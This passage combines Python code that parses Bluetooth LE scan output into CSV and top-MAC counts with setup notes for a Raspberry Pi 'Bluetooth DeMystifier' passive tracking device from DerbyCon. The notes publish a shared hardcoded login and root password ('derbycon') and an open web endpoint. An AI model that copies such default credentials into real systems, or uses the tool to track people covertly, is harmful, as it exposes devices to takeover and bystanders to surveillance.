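def parse_lescan(text, now=None):
    """One dict per advertisement line; the banner and garbage are skipped."""
    ts = (now or datetime.now(timezone.utc)).strftime("%Y-%m-%dT%H:%M:%SZ")
    rows = []
    for line in text.splitlines():
        m = LESCAN_RE.match(line.strip())
        if not m:
            continue
        mac = m.group(1).upper()
        name = m.group(2).strip()
        rows.append({
            "timestamp": ts,
            "mac": mac,
            "vendor": OUI.get(mac[:8], "unknown"),   # first three octets = OUI
            "name": "" if name == "(unknown)" else name,
        })
    return rows


def top_macs(rows, n=10):
    """[(mac, count), ...] most observed first, like the BUTTON 1 graph."""
    return collections.Counter(r["mac"] for r in rows).most_common(n)


def to_csv(rows):
    buf = io.StringIO()
    w = csv.DictWriter(buf, fieldnames=["timestamp", "mac", "vendor", "name"],
                       lineterminator="\n")
    w.writeheader()
    w.writerows(rows)
    return buf.getvalue()


if __name__ == "__main__":
    rows = parse_lescan(SAMPLE_LESCAN)
    print(to_csv(rows))
    print(top_macs(rows))
```

Advertised names are attacker-controlled strings (anyone can name a device whatever they like), which is why they go through the csv module rather than string concatenation, and why the web view should escape them before rendering.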





How to access the SSH and WEB interfaces:
In order to access the SSH and web interfaces you will need to modify the existing 'wpa_supplicant.conf' file to use your own wireless network. This can be done by mounting the SD card and editing the "/etc/wpa_supplicant/wpa_supplicant.conf" file on it.

wpa_supplicant.conf:
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1

network={
 ssid="YOUR WIFI_SSID"
 psk="YOUR_WPA_KEY"
}

------------------------------------------------
Once your Bluetooth DeMystifier is online...you can log in to SSH by using the following methodology below.

SSH LOGIN:


1. Log in to Raspberry PI using the user 'pi2' and the password 'derbycon'
2. Gain root privileges using the command 'su -' and then using 'derbycon' as the password.
3. All data and important files are in '/home/pi/installs'.
4. Factory reset the DeMystifier (clearing out all bluetooth stats and starting over) by running '/home/pi/installs/clean.sh' and rebooting.

------------------------------------------------

WEB ACCESS:
The web interface for 'Bluetooth DeMystifier' provides additional graphs, logs, and ability to plot any Mac Address you request. Available data includes...

  • Bluetooth Stats - Macs, Vendors, Strings
  • All Discovered Devices (Name/Mac)
  • Discovered Devices Last 5 Minutes (Name/Mac)
  • CSV Version of Log Data
  • Top 10 MACADDRS - Last 10 Minutes
  • Top 10 MACADDRS - All-Time
Sample CSV output data shown below...

Use the '/home/pi/installs/tags.txt' file to create MAC-to-TAG translations as well as plot any Mac Address using the request URL below:

http://YOUR_IP_ADDRESS:1337/?macaddr=01:02:03:04:05:06


Thank you DerbyCon!
It was a great DerbyCon and I can't wait to go back next year. Great staff, family and local hospitality (not to mention the great food and drink). To many more!